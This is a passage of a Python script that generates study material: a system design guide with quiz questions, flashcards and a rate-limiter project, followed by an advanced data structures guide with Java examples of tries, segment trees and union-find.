    "  URL avg size: 200 bytes → 100M × 200 = 20GB/day storage",
    "  10 years: 73TB",
    "",
    "API:",
    "  POST /shorten { longUrl, customAlias?, expiresAt? } → { shortUrl }",
    "  GET  /{shortCode} → 301 Redirect to longUrl",
    "",
    "DB SCHEMA:",
    "  urls table:",
    "    short_code  CHAR(7)  PRIMARY KEY",
    "    long_url    TEXT     NOT NULL",
    "    user_id     BIGINT",
    "    created_at  TIMESTAMP",
    "    expires_at  TIMESTAMP",
    "    clicks      BIGINT DEFAULT 0",
    "",
    "SHORT CODE GENERATION:",
    "  Option 1: Hash (MD5 of longUrl, take first 7 chars)",
    "    Problem: collisions! 2 different URLs → same 7 chars occasionally",
    "    Fix: check DB, if collision increment counter suffix",
    "",
    "  Option 2: Auto-increment ID converted to Base62",
    "    ID 100 → Base62 = '1C'",
    "    Base62 = [a-z A-Z 0-9] = 62 chars",
    "    7 chars of Base62 = 62^7 = 3.5 trillion unique codes",
    "    Problem: predictable sequential IDs",
    "",
    "  Option 3: Distributed ID generator (Twitter Snowflake) → Base62",
    "    Best: unique, non-sequential, sortable by time",
    "",
    "SCALING:",
    "  Cache layer: Redis stores short_code → long_url",
    "    300K QPS: Redis handles this easily",
    "    Cache hit: ~0.5ms (no DB needed)",
    "    Cache miss rate: 1% (long tail of unique links)",
    "",
    "  301 vs 302 redirect:",
    "    301 (permanent): browser caches it, future visits don't hit your server",
    "              → lower server load but can't track clicks accurately",
    "    302 (temporary): every visit hits your server → accurate analytics",
    "```",
    "",
    "---",
    "",
    "## Case Study 2: Design Twitter/X Feed",
    "",
    "```",
    "REQUIREMENTS:",
    "  - Users follow other users",
    "  - Tweets appear in follower feeds (chronological or ranked)",
    "  - 300M users, 500M tweets/day",
    "",
    "THE CORE TENSION: Fan-out on write vs Fan-out on read",
    "",
    "FAN-OUT ON WRITE (push model):",
    "  When Alice tweets, immediately write to ALL her followers' feed caches",
    "",
    "  Alice (10M followers) tweets:",
    "  → Write tweet to 10M feed caches simultaneously",
    "  Write amplification: 1 tweet × 10M followers = 10M writes",
    "",
    "  Read: just read pre-computed feed cache. Super fast.",
    "  Write: expensive if you're a celebrity with 10M followers",
    "",
    "FAN-OUT ON READ (pull model):",
    "  User opens feed, query: 'get tweets from all accounts I follow, sorted by time'",
    "",
    "  Read: JOIN tweets × follows. Slow for users following 1000 accounts.",
    "  Write: just write the one tweet. Simple.",
    "",
    "TWITTER'S HYBRID SOLUTION:",
    "  Normal users (< 1M followers): fan-out on write pre-compute",
    "  Celebrities (10M+ followers): fan-out on read at serving time",
    "  Merge at read: your feed = precomputed cache + real-time celebrity tweets",
    "",
    "STORAGE:",
    "  Tweets: NoSQL (Cassandra) for high write throughput, chronological access",
    "  User graph (follows): Graph DB or adjacency list in Redis",
    "  Feed cache: Redis sorted set per user (score = tweet timestamp)",
    "              ZADD user:123:feed <timestamp> <tweet_id>",
    "              ZREVRANGE user:123:feed 0 99  ← get 100 latest",
    "```",
    "",
    "---",
    "",
    "## Case Study 3: Design a Chat System",
    "",
    "```",
    "REQUIREMENTS:",
    "  - 1:1 and group messaging",
    "  - Real-time delivery",
    "  - Message history",
    "  - Online status",
    "",
    "KEY TECHNICAL DECISION: How does the server PUSH messages to clients?",
    "",
    "  Option 1: Short polling — client asks 'new messages?' every 3 seconds",
    "    Cons: 3 second delay, wasted requests when no messages",
    "",
    "  Option 2: Long polling — client holds request open until message arrives",
    "    Not truly bidirectional",
    "",
    "  Option 3: WebSocket — persistent bidirectional connection",
    "    Perfect for chat — server pushes instantly, client sends instantly",
    "    WhatsApp, Slack, Discord — all use WebSockets",
    "",
    "ARCHITECTURE:",
    "  Client <── WebSocket ──> Chat Server <──> Message Queue (Kafka)",
    "                                ↓",
    "                          DB (Cassandra)",
    "                                ↓",
    "                          Push notifications (APNS/FCM) for offline users",
    "",
    "GROUP CHAT FAN-OUT:",
    "  Alice sends to group of 1000 members:",
    "  → Kafka message read by fan-out service",
    "  → Deliver to each member's WebSocket server",
    "  → 999 members who are offline: push notification",
    "",
    "PRESENCE SYSTEM (online/offline status):",
    "  Heartbeat: client sends ping every 5 seconds",
    "  Server stores userId → lastSeen in Redis with 60s TTL",
    "  If TTL expires → user offline",
    "",
    "MESSAGE STORAGE (Cassandra):",
    "  PRIMARY KEY: (channel_id, message_id) — messages grouped by channel",
    "  Read: LIMIT 20 WHERE channel_id = ? ORDER BY message_id DESC",
    "  Cassandra designed for time-series append workloads — perfect match",
    "```",
    "",
    "---",
    "",
    "## Data Store Decision Matrix",
    "",
    "```",
    "+------------------------+----------------------------------+",
    "| Need                   | Use                              |",
    "+------------------------+----------------------------------+",
    "| Simple structured data | PostgreSQL / MySQL               |",
    "| High write throughput  | Cassandra / DynamoDB             |",
    "| Caching / sessions     | Redis                            |",
    "| Full-text search       | Elasticsearch                    |",
    "| Graph relationships    | Neo4j / Amazon Neptune           |",
    "| Object storage         | S3                               |",
    "| Time-series metrics    | InfluxDB / Prometheus            |",
    "| Queue / streaming      | Kafka / SQS / RabbitMQ          |",
    "+------------------------+----------------------------------+",
    "```",
    "",
    "---",
    "",
    "## Mind Map",
    "",
    "```",
    "SYSTEM DESIGN",
    "|",
    "+-- PROCESS",
    "|   +-- RESHADED framework",
    "|   +-- Clarify requirements first",
    "|   +-- Estimate scale (QPS, storage)",
    "|   +-- API design before DB",
    "|",
    "+-- SCALE",
    "|   +-- Read vs write ratio",
    "|   +-- Read-heavy -> cache",
    "|   +-- Write-heavy -> queue + async",
    "|   +-- Single server limits",
    "|",
    "+-- CASE STUDIES",
    "|   +-- URL Shortener: base62, Redis cache, 301 vs 302",
    "|   +-- Twitter Feed: fan-out on write vs read",
    "|   +-- Chat: WebSocket, Kafka, Cassandra",
    "|",
    "+-- DATA STORES",
    "    +-- SQL: structured, ACID",
    "    +-- Cassandra: high-write time-series",
    "    +-- Redis: cache + pub/sub",
    "    +-- Kafka: event streaming",
    "    +-- S3: object storage",
    "```",
    "",
    "---",
    "",
    "## References",
    "",
    "### Videos",
    "- **System Design Interview Course** by Alex Xu (author of System Design Interview book):",
    "  https://www.youtube.com/playlist?list=PLjTveVh7FakLdTmm42TMxbN8PvVn5g4KJ",
    "- **Designing Twitter/TikTok** by Gaurav Sen:",
    "  https://www.youtube.com/watch?v=wYk0xPP_P_8",
    "",
    "### Books & Articles",
    "- **System Design Interview (Vol 1)** by Alex Xu — best book on the topic",
    "- **Designing Data-Intensive Applications** by Martin Kleppmann — deep technical reference",
    "- **High Scalability blog**: http://highscalability.com/ — real architecture case studies",
    "",
    "### Practice",
    "- **ByteByteGo**: https://bytebytego.com — visual system design newsletter",
    "- **Excalidraw**: https://excalidraw.com — draw your architecture",
])

SYSDESIGN_Q = [
    {"id":"sd-q1","type":"mcq","prompt":"What is the first thing you should do in a system design interview?",
     "choices":["Start drawing the architecture","Jump to choosing a database","Clarify functional and non-functional requirements — what the system must do and at what scale","Estimate storage immediately"],
     "answerIndex":2,"explanation":"Requirements clarification prevents wasted work. You need to know: what features are required? What scale (users, QPS, storage)? What is the SLA? Only then can you design the right system.","tags":["system-design","process"]},
    {"id":"sd-q2","type":"mcq","prompt":"A URL shortener has 100M creates/day and 10B redirects/day. What is the read:write ratio?",
     "choices":["1:1","10:1","100:1","1000:1"],
     "answerIndex":2,"explanation":"10B reads / 100M writes = 100:1 read-heavy. This immediately tells you: optimise for reads. Add caching (Redis). Use CDN. A read-heavy system should cache aggressively at every layer.","tags":["estimation","read-write-ratio"]},
    {"id":"sd-q3","type":"mcq","prompt":"Why use Base62 encoding for short URL codes?",
     "choices":["Base62 is more secure than Base64","62 characters (a-z, A-Z, 0-9) allows short but unique codes. 7 chars = 62^7 ≈ 3.5 trillion unique codes without special URL characters","Base62 compresses better","Required by HTTP"],
     "answerIndex":1,"explanation":"Base62 avoids special characters (+, /) that can cause URL encoding issues. 7 chars gives 3.5 trillion codes — enough for any realistic URL shortener. Numeric IDs converted to Base62 are human-readable and short.","tags":["url-shortener","encoding"]},
    {"id":"sd-q4","type":"mcq","prompt":"For the Twitter feed, what is 'fan-out on write'?",
     "choices":["Writing to multiple databases simultaneously","When a tweet is posted, immediately writing it to the feed caches of all followers — pre-computing feeds at write time for fast read","Writing fan-out notifications","Fan-out is HTTP multiplexing"],
     "answerIndex":1,"explanation":"Fan-out on write: 1 tweet → N writes (one per follower). Reads are instant (just read pre-computed cache). Problem: celebrities with 10M followers cause 10M writes per tweet. Twitter uses this for normal users, switches to fan-out on read for celebrities.","tags":["twitter","fan-out","system-design"]},
    {"id":"sd-q5","type":"mcq","prompt":"Why is WebSocket preferred over long polling for a chat application?",
     "choices":["WebSocket uses less memory","WebSocket is encrypted","WebSocket provides true bidirectional persistent connection — server pushes messages instantly, lower latency than polling, no repeated HTTP overhead","WebSocket works without authentication"],
     "answerIndex":2,"explanation":"Long polling: client opens request, server holds it open until message arrives, then client must immediately open a new request. WebSocket: single persistent connection, server pushes any time, no overhead per message. True real-time.","tags":["websocket","chat","real-time"]},
    {"id":"sd-q6","type":"mcq","prompt":"What does the CAP theorem state?",
     "choices":["A distributed system can achieve Consistency, Availability, and Partition tolerance simultaneously","A distributed system can guarantee at most TWO of: Consistency, Availability, Partition tolerance. During a network partition, choose between consistency or availability.","CAP applies only to SQL databases","CAP only matters for more than 3 nodes"],
     "answerIndex":1,"explanation":"Network partitions happen. When they do: CP systems (Cassandra configured for consistency) reject writes rather than risk inconsistency. AP systems (Cassandra default) accept writes, risk stale reads. No system achieves all 3 during partition.","tags":["cap-theorem","distributed"]},
    {"id":"sd-q7","type":"mcq","prompt":"What is a CDN and when should you use it?",
     "choices":["Content Delivery Network — caches static assets at edge servers worldwide, serving users from nearest location — reduces latency and origin server load for static content","CDN is a type of database","CDN only works for video","CDN replaces the backend server"],
     "answerIndex":0,"explanation":"CDN: edge servers distributed globally. User in Tokyo gets images from a Tokyo edge server (10ms) instead of your US origin server (200ms). Use for: static assets, images, video, even API responses that can be cached. Reduces origin load significantly.","tags":["cdn","caching","latency"]},
    {"id":"sd-q8","type":"mcq","prompt":"A Cassandra table uses (channel_id, message_id) as composite primary key. What access pattern does this optimise?",
     "choices":["Full table scan of all messages","Fetching recent messages for a specific channel in order — messages are physically stored together per channel, sorted by message_id","Random single-message lookup","Cross-channel queries"],
     "answerIndex":1,"explanation":"Cassandra stores rows with same partition key (channel_id) together on disk. Reading 100 latest messages for channel 42 is a sequential read on the same partition — very fast. This is why Cassandra excels at time-series and append workloads.","tags":["cassandra","data-modeling","chat"]},
    {"id":"sd-q9","type":"mcq","prompt":"301 vs 302 redirect for a URL shortener — what is the key trade-off?",
     "choices":["301 is HTTP/1.1 only","301 (Permanent): browser caches and never hits your server again — saves load but loses click analytics. 302 (Temporary): browser always hits your server — accurate analytics but more load.","302 is faster","They behave identically for users"],
     "answerIndex":1,"explanation":"301: browser caches the redirect permanently. Subsequent visits go directly to longUrl — no analytics, massive load reduction. 302: every visit hits your redirector — accurate click tracking, more load. Choose based on requirements: analytics vs scalability.","tags":["url-shortener","http","trade-offs"]},
    {"id":"sd-q10","type":"mcq","prompt":"In the Twitter hybrid approach, how are celebrity tweets (10M+ followers) handled differently?",
     "choices":["Celebrity tweets are deleted faster","Celebrity tweets use fan-out on read — served directly from the celebrity's tweet cache at read time rather than pre-computed into 10M follower feeds","Celebrity accounts disabled fan-out","Celebrity tweets are compressed"],
     "answerIndex":1,"explanation":"Writing to 10M feeds per tweet (Beyoncé has 25M followers) = 25M DB writes for one tweet. Twitter avoids this by keeping celebrity tweets separately and merging them into your feed at read time — hybrid approach balancing write and read cost.","tags":["twitter","fan-out","celebrity"]},
    {"id":"sd-q11","type":"mcq","prompt":"You need to store 500 million user events per day with high write throughput and time-based queries. Best database choice?",
     "choices":["MySQL with indexes","Cassandra or DynamoDB — designed for high write throughput and partition-key-based time-series queries at scale","MongoDB","PostgreSQL with partitioning"],
     "answerIndex":1,"explanation":"500M writes/day = ~5800 writes/sec. MySQL single server handles ~1000 QPS. Cassandra is designed for this: linear horizontal scaling, optimised for append-heavy time-series, handles millions of writes/sec across nodes.","tags":["database-choice","cassandra","scale"]},
    {"id":"sd-q12","type":"mcq","prompt":"What is a message queue's role in system design?",
     "choices":["Replaces the database","Acts as a buffer between producers and consumers — decouples services, absorbs traffic spikes, enables async processing, guarantees delivery even if consumer is temporarily down","Caches API responses","Handles authentication"],
     "answerIndex":1,"explanation":"Queue = async decoupling. User places order → order service writes to queue and returns immediately. Payment, email, inventory services consume at their own pace. If email service is down, messages wait. Queue absorbs Black Friday spikes gracefully.","tags":["message-queue","decoupling"]},
    {"id":"sd-q13","type":"mcq","prompt":"In a presence system (online/offline status), a user sends heartbeat pings every 5 seconds. The Redis key has 60s TTL. What is the offline detection delay?",
     "choices":["5 seconds","Up to 60 seconds — the key expires 60 seconds after last heartbeat, so user offline detection lag is 60s","Immediate","10 seconds"],
     "answerIndex":1,"explanation":"Each heartbeat refreshes the Redis TTL. If user disconnects, no more heartbeats, TTL starts counting down. After 60s with no heartbeat, key expires = user marked offline. Trade-off: shorter TTL = faster detection but more Redis writes from heartbeats.","tags":["presence","redis","chat"]},
    {"id":"sd-q14","type":"mcq","prompt":"When estimating a system, Twitter has 300M users, 20% post daily, average 3 tweets each. What is tweets/day?",
     "choices":["300M","60M","18M","180M"],
     "answerIndex":3,"explanation":"300M × 20% = 60M daily active tweeters. 60M × 3 = 180M tweets/day. This estimation approach (DAU × action rate × size) is the foundation of capacity planning. Know it cold.","tags":["estimation","back-of-envelope"]},
    {"id":"sd-q15","type":"mcq","prompt":"What is the primary advantage of consistent hashing for distributed caches?",
     "choices":["Alphabetical key distribution","When adding/removing cache nodes, only K/N keys need to be remapped (where K=keys, N=nodes) instead of all keys — minimises cache invalidation","Consistent hashing encrypts keys","Better for small clusters"],
     "answerIndex":1,"explanation":"Regular modulo hashing: add 1 node = remap ~all keys. Consistent hashing: nodes and keys on a ring. Add node = only keys between it and its predecessor remap (~1/N of all keys). Critical for large distributed caches.","tags":["consistent-hashing","caching","distributed"]},
    {"id":"sd-q16","type":"mcq","prompt":"Redis ZADD and ZREVRANGE operations: how does Twitter use them for feeds?",
     "choices":["Redis stores tweets as strings","ZADD user:123:feed <timestamp> <tweet_id> adds tweets to a sorted set. ZREVRANGE user:123:feed 0 99 returns 100 latest tweet IDs sorted by timestamp — O(log N) insert, O(log N + M) range query","Redis stores the full tweet content","ZADD is for counters only"],
     "answerIndex":1,"explanation":"Redis sorted set: members (tweet IDs) with scores (timestamps). ZADD inserts in O(log N). ZREVRANGE reads top 100 in order in O(log N + 100). Feed = just read the tweet IDs, then fetch tweet content from tweet service. Fast, scalable.","tags":["redis","twitter","feed"]},
    {"id":"sd-q17","type":"multi","prompt":"Which factors determine whether to use SQL vs NoSQL? (Select all that apply)",
     "choices":["Whether data has relationships and ACID requirements (SQL better)","Expected write throughput (very high write = NoSQL advantage)","Whether you need flexible schema (NoSQL)","NoSQL is always faster"],
     "answerIndexes":[0,1,2],"explanation":"SQL: structured data, relationships, ACID, complex queries. NoSQL: flexible schema, horizontal scale, high write throughput, simple access patterns. NoSQL is not always faster — for complex joins, SQL with indexes beats NoSQL.","tags":["database-choice","sql","nosql"]},
    {"id":"sd-q18","type":"mcq","prompt":"What is database connection pooling and why is it important?",
     "choices":["Storing query results in memory","Maintaining a pool of pre-established database connections that are reused — eliminates connection setup overhead (3-way TCP + auth) on every request, prevents connection storms","Replicating the database","Sharding connections"],
     "answerIndex":1,"explanation":"Creating a DB connection costs 20-100ms (TCP handshake + auth). Without pooling: 1000 concurrent requests = 1000 new connections = 100 seconds of overhead. With pooling: 20 connections reused. Most ORMs (Spring Data, SQLAlchemy) pool by default.","tags":["database","connection-pool","performance"]},
    {"id":"sd-q19","type":"mcq","prompt":"Why use an ID generator (like Twitter Snowflake) instead of auto-increment for a distributed URL shortener?",
     "choices":["Auto-increment works fine in distributed systems","Auto-increment requires a coordinating DB node that becomes a bottleneck. Snowflake IDs: generated locally by each server, globally unique, time-sortable, no coordination needed","Snowflake IDs are shorter","Auto-increment is not supported in NoSQL"],
     "answerIndex":1,"explanation":"Auto-increment in MySQL: single sequence generator = every write must go to this node. Single point of failure + bottleneck at scale. Snowflake: 64-bit ID = timestamp(41) + datacenter(5) + worker(5) + sequence(12). Each server generates unique IDs independently.","tags":["id-generation","distributed","url-shortener"]},
    {"id":"sd-q20","type":"mcq","prompt":"In the RESHADED framework, what comes after requirements clarification?",
     "choices":["High-level design","Algorithm choice","Estimation — estimate scale: QPS, storage, bandwidth, number of servers needed","Database choice"],
     "answerIndex":2,"explanation":"Estimation immediately follows requirements. It forces you to think about scale and shapes every design decision. 100 QPS? One server. 1M QPS? Caching, sharding, CDN. Interviewer wants to see you can back-of-envelope any system.","tags":["system-design","process","estimation"]},
]

SYSDESIGN_FC = [
    {"id":"sd-fc1","front":"RESHADED framework","back":"Requirements → Estimation → System interface (API) → High-level design → Algorithm/data → Data store → Extend (bottlenecks) → Discussion. Use this order in every system design interview to show structured thinking.","tags":["system-design","interview"]},
    {"id":"sd-fc2","front":"URL Shortener — core choices","back":"ID gen: Base62(Snowflake ID) = 7-char unique code. DB: MySQL for structured data. Cache: Redis short→long for reads. 301 vs 302: 302 for analytics, 301 for scale. Cache hit rate target: 99% (20% of URLs = 80% of traffic).","tags":["url-shortener"]},
    {"id":"sd-fc3","front":"Fan-out on write vs read","back":"Write: push tweet to all followers' feeds. Fast read, expensive write for celebrities. Read: compute feed at request time. Slow read, cheap write. Hybrid: write for normal users, read for celebrities. Twitter uses hybrid.","tags":["twitter","fan-out"]},
    {"id":"sd-fc4","front":"Chat system — key choices","back":"Transport: WebSocket (persistent bidirectional). Storage: Cassandra (channel_id partition, message_id clustering). Scale: Kafka fan-out for group messages. Presence: Redis TTL heartbeat. Offline: push notifications (APNS/FCM).","tags":["chat","websocket","cassandra"]},
    {"id":"sd-fc5","front":"Back-of-envelope estimation","back":"RAM: 100ns. SSD: 100μs. Network same-DC: 500μs. Cross-region: 50ms. MySQL: 1K QPS. Redis: 100K QPS. Calculate: users × DAU% × actions/day = QPS. Add 3x safety buffer.","tags":["estimation","latency"]},
    {"id":"sd-fc6","front":"Database selection matrix","back":"Structured + ACID = PostgreSQL. High write throughput = Cassandra/DynamoDB. Cache = Redis. Search = Elasticsearch. Graph = Neo4j. Object storage = S3. Queue = Kafka/SQS. Don't default to MySQL for everything.","tags":["database-choice"]},
    {"id":"sd-fc7","front":"CAP theorem in practice","back":"Can't have all 3 (Consistency, Availability, Partition-tolerance) during a network partition. CP: reject writes to stay consistent (banking). AP: accept writes, risk stale reads (social feeds). Choose based on business requirements.","tags":["cap-theorem","distributed"]},
    {"id":"sd-fc8","front":"Read vs write heavy systems","back":"Read-heavy (URL shortener 100:1): add caching layers, CDN, read replicas. Write-heavy (event logging): async queues (Kafka), NoSQL DB, append-only. Determine ratio in estimation step — it drives architecture.","tags":["read-write-ratio","caching"]},
]

SYSDESIGN_PROJ = {
    "brief": "Design a rate limiter for a public API (like GitHub API or Twitter API). Requirements: limit each API key to 1000 requests per hour. Works across multiple API server instances. Returns 429 Too Many Requests with Retry-After header. Supports burst (momentary spikes allowed) via token bucket algorithm. Storage? Algorithm? What happens if rate limit store is down?",
    "checklist": [
        {"id":"sd1","text":"Algorithm: Token Bucket — bucket fills at fixed rate, each request consumes a token. Allows bursts up to bucket capacity.","weight":20},
        {"id":"sd2","text":"Storage: Redis with atomic operations (INCR + EXPIRE or Lua script). Redis sorted set for sliding window alternative.","weight":20},
        {"id":"sd3","text":"Distributed: Redis shared across all API servers — each server queries same Redis key. Alternative: consistent hashing per API key to specific server.","weight":20},
        {"id":"sd4","text":"Response: 429 with headers: X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Reset, Retry-After.","weight":20},
        {"id":"sd5","text":"Fallback: if Redis is down, fail open (allow traffic) or fail closed (block all). Documented trade-off.","weight":20},
    ],
    "hints": [
        "Redis INCR is atomic. Use: INCR key, if result == 1 then EXPIRE key 3600. Handles distributed counter atomically.",
        "Sliding window with Redis sorted set: ZADD key timestamp requestId, ZREMRANGEBYSCORE cleanup, ZCARD = count in window.",
        "Token bucket in Redis: store {tokens, lastRefillTime} per key. Lua script atomically refills and decrements.",
    ]
}

write("security", "system-design-fundamentals.json", {
    "id": "system-design-fundamentals",
    "unit": 11,
    "order": 111,
    "title": "System Design Fundamentals",
    "summary": "Design URL shorteners, Twitter feeds, and chat systems. Learn estimation, trade-offs, and how to think at scale.",
    "prereqs": ["caching", "sharding", "kafka"],
    "guide": SYSDESIGN_GUIDE,
    "questions": SYSDESIGN_Q,
    "flashcards": SYSDESIGN_FC,
    "project": SYSDESIGN_PROJ,
})

# ─── TOPIC 3: data-structures-advanced ───────────────────────────────────────

DSA_ADV_GUIDE = "\n".join([
    "# Advanced Data Structures",
    "",
    "## Why Go Beyond Arrays and HashMaps?",
    "",
    "Standard data structures handle 80% of problems. The remaining 20% — problems that",
    "require range queries, prefix operations, union/find relationships, or priority access",
    "— have specialised structures that are asymptotically faster.",
    "",
    "Think of it as having more tools in your toolkit. A hammer solves most things,",
    "but a screwdriver is fundamentally better for screws.",
    "",
    "---",
    "",
    "## Trie (Prefix Tree)",
    "",
    "```",
    "A Trie stores strings by breaking them into characters.",
    "Each node = one character. Prefix sharing = shared nodes.",
    "",
    "Insert: ['cat', 'car', 'card', 'dog']",
    "",
    "        root",
    "        /  \\",
    "       c    d",
    "       |    |",
    "       a    o",
    "      / \\   |",
    "     t   r  g*",
    "     *   |",
    "         d*",
    "         |",
    "         (also 'car'*)",
    "",
    "* = end of word",
    "",
    "Operations: O(L) where L = string length (independent of number of strings!)",
    "  Insert 'car':   follow c→a→r, mark r as endOfWord",
    "  Search 'car':   follow c→a→r, check endOfWord = true",
    "  StartsWith 'ca': follow c→a, exists? = true",
    "  All words with prefix 'ca': DFS from 'a' node → [cat, car, card]",
    "",
    "When to use Trie:",
    "  - Autocomplete (type 'ca' → suggest 'cat', 'car', 'card')",
    "  - Spell check (is this a valid word?)",
    "  - IP routing (longest prefix match for network routes)",
    "  - Word search in a grid (LeetCode Word Search II)",
    "```",
    "",
    "```java",
    "class TrieNode {",
    "    TrieNode[] children = new TrieNode[26]; // a-z",
    "    boolean isEnd = false;",
    "}",
    "",
    "class Trie {",
    "    private TrieNode root = new TrieNode();",
    "",
    "    public void insert(String word) {",
    "        TrieNode node = root;",
    "        for (char c : word.toCharArray()) {",
    "            int i = c - 'a';",
    "            if (node.children[i] == null)",
    "                node.children[i] = new TrieNode();",
    "            node = node.children[i];",
    "        }",
    "        node.isEnd = true;",
    "    }",
    "",
    "    public boolean search(String word) {",
    "        TrieNode node = root;",
    "        for (char c : word.toCharArray()) {",
    "            int i = c - 'a';",
    "            if (node.children[i] == null) return false;",
    "            node = node.children[i];",
    "        }",
    "        return node.isEnd;",
    "    }",
    "}",
    "```",
    "",
    "---",
    "",
    "## Segment Tree",
    "",
    "```",
    "PROBLEM: Array [3, 1, 4, 1, 5, 9, 2, 6]",
    "  Query: sum from index 2 to 5?      O(n) naive",
    "  Update: change index 3 to 7?       O(1) naive",
    "  But: 100K queries + 100K updates?  O(n) per query = too slow",
    "",
    "SEGMENT TREE: O(log n) for both query and update",
    "",
    "Array:  [3, 1, 4, 1, 5, 9, 2, 6]",
    " idx:   [0  1  2  3  4  5  6  7]",
    "",
    "                [0-7: 31]",
    "               /            \\",
    "        [0-3: 9]            [4-7: 22]",
    "        /      \\            /       \\",
    "   [0-1: 4]  [2-3: 5]  [4-5: 14]  [6-7: 8]",
    "    /   \\    /    \\     /    \\     /    \\",
    "   [3]  [1] [4]  [1]  [5]  [9]  [2]  [6]",
    "",
    "Query sum [2..5]:",
    "  Decompose into: [2-3: 5] + [4-5: 14] = 19  (2 node lookups, not 4)",
    "",
    "Update index 3 = 7:",
    "  Update leaf [1→7], propagate up:",
    "  [2-3: 5→11], [0-3: 9→15], [0-7: 31→37]",
    "  (touch only log n nodes)",
    "```",
    "",
    "```java",
    "class SegmentTree {",
    "    int[] tree;",
    "    int n;",
    "",
    "    SegmentTree(int[] arr) {",
    "        n = arr.length;",
    "        tree = new int[4 * n];",
    "        build(arr, 0, 0, n - 1);",
    "    }",
    "",
    "    void build(int[] arr, int node, int start, int end) {",
    "        if (start == end) { tree[node] = arr[start]; return; }",
    "        int mid = (start + end) / 2;",
    "        build(arr, 2*node+1, start, mid);",
    "        build(arr, 2*node+2, mid+1, end);",
    "        tree[node] = tree[2*node+1] + tree[2*node+2];",
    "    }",
    "",
    "    int query(int node, int start, int end, int l, int r) {",
    "        if (r < start || end < l) return 0;  // no overlap",
    "        if (l <= start && end <= r) return tree[node];  // total overlap",
    "        int mid = (start + end) / 2;",
    "        return query(2*node+1, start, mid, l, r)",
    "             + query(2*node+2, mid+1, end, l, r);",
    "    }",
    "}",
    "```",
    "",
    "---",
    "",
    "## Union-Find (Disjoint Set Union — DSU)",
    "",
    "```",
    "PROBLEM: Given a graph with edges added one at a time,",
    "  'Are nodes A and B in the same connected component?'",
    "  'Does adding this edge create a cycle?'",
    "",
    "Union-Find maintains groups (sets) of elements.",
    "Two operations: find(x) = which group is x in? union(x, y) = merge groups.",
    "",
    "Visual:",
    "  Initial: {1} {2} {3} {4} {5}    (each node is its own group)",
    "",
    "  union(1, 2): {1,2} {3} {4} {5}",
    "  union(2, 3): {1,2,3} {4} {5}",
    "  union(4, 5): {1,2,3} {4,5}",
    "",
    "  find(1) == find(3)?  YES (same component)",
    "  find(1) == find(4)?  NO  (different components)",
    "",
    "OPTIMISATIONS (make both operations nearly O(1)):",
    "  1. Union by rank: attach smaller tree under larger tree",
    "  2. Path compression: find() flattens tree as it traverses",
    "",
    "  Path compression:",
    "    Before: 1 → 2 → 3 → 4 (root)",
    "    find(1) traverses to root (4)",
    "    After: 1 → 4, 2 → 4, 3 → 4  (all point directly to root)",
    "    Next find(1): O(1) — directly to root",
    "",
    "Time: O(α(n)) per operation — inverse Ackermann, effectively O(1)",
    "```",
    "",
    "```java",
    "class UnionFind {",
    "    int[] parent, rank;",
    "",
    "    UnionFind(int n) {",
    "        parent = new int[n];",
    "        rank = new int[n];",
    "        for (int i = 0; i < n; i++) parent[i] = i;",
    "    }",
    "",
    "    int find(int x) {",
    "        if (parent[x] != x)",
    "            parent[x] = find(parent[x]);  // path compression",
    "        return parent[x];",
    "    }",
    "",
    "    boolean union(int x, int y) {",
    "        int px = find(x), py = find(y);",
    "        if (px == py) return false;  // already same component (cycle!)",
    "        if (rank[px] < rank[py]) { int t = px; px = py; py = t; }",
    "        parent[py] = px;",
    "        if (rank[px] == rank[py]) rank[px]++;",
    "        return true;",
    "    }",
    "}",
    "```",
    "",
    "---",
    "",
    "## Heap Tricks Beyond Priority Queue",
    "",
    "```",
    "Top-K pattern (k largest elements from stream of N):",
    "",
    "  Naive: sort everything → O(N log N)",
    "  Heap:  maintain min-heap of size k → O(N log k)",
    "",
    "  Algorithm:",
    "    For each number x in stream:",
    "      If heap.size() < k: add x",
    "      Else if x > heap.peek(): heap.poll(), heap.add(x)",
    "    Result: heap contains k largest elements",
    "",
    "  Why min-heap for k LARGEST?",
    "    heap.peek() = current smallest of top-k.",
    "    New element > smallest of top-k → it belongs in top-k → evict smallest.",
    "",
    "  Java:",
    "    PriorityQueue<Integer> minHeap = new PriorityQueue<>();  // min-heap by default",
    "    PriorityQueue<Integer> maxHeap = new PriorityQueue<>(Comparator.reverseOrder());",
    "",
    "Median from data stream:",
    "  Two heaps: maxHeap (lower half) + minHeap (upper half)",
    "  Invariant: maxHeap.size() == minHeap.size() OR maxHeap.size() == minHeap.size()+1",
    "  Median: maxHeap.peek() (odd total) or avg of both peeks (even total)",
    "  Each insert: O(log n). Query median: O(1).",
    "```",
    "",
    "---",
    "",
    "## Monotonic Stack",
    "",
    "```",
    "A stack that maintains elements in monotonically increasing or decreasing order.",
    "Used for 'Next Greater Element', histogram area, temperature problems.",
    "",
    "Next Greater Element: for each element, find the next element to its right that is larger.",
    "",
    "arr = [2, 5, 3, 7, 1]",
    "      [5, 7, 7,-1,-1]  ← next greater, -1 if none",
    "",
    "Algorithm (monotonic decreasing stack):",
    "  For each element x:",
    "    While stack not empty AND stack.top() < x:",
    "      result[stack.pop()] = x  ← x is the next greater for popped element",
    "    stack.push(index of x)",
    "",
    "  [2]: push 2. stack=[2]",
    "  [5]: 5 > 2, pop 2, result[0]=5. push 5. stack=[5]",
    "  [3]: 3 < 5, push. stack=[5,3]",
    "  [7]: 7 > 3, result[2]=7. 7 > 5, result[1]=7. push 7. stack=[7]",
    "  [1]: 1 < 7, push. stack=[7,1]",
    "  End: remaining in stack get result -1",
    "",
    "Time: O(n) — each element pushed and popped at most once.",
    "Use for: stock span, largest rectangle in histogram, trapping rain water.",
    "```",
    "",
    "---",
    "",
    "## Mind Map",
    "",
    "```",
    "ADVANCED DATA STRUCTURES",
    "|",
    "+-- TRIE",
    "|   +-- Prefix tree: O(L) operations",
    "|   +-- Use: autocomplete, spell check, IP routing",
    "|   +-- children[26] array at each node",
    "|",
    "+-- SEGMENT TREE",
    "|   +-- Range query + point update: O(log n)",
    "|   +-- Build: O(n), 4n array size",
    "|   +-- Use: range sum, range min/max",
    "|",
    "+-- UNION-FIND",
    "|   +-- Connected components, cycle detection",
    "|   +-- Path compression + union by rank = O(α(n))",
    "|   +-- Use: MST (Kruskal), number of islands",
    "|",
    "+-- HEAP TRICKS",
    "|   +-- Top-k: min-heap of size k",
    "|   +-- Median stream: maxHeap + minHeap split",
    "|",
    "+-- MONOTONIC STACK",
    "    +-- Maintain sorted invariant",
    "    +-- O(n) for next greater/smaller",
    "    +-- Use: histogram, stock span, rain water",
    "```",
    "",
    "---",
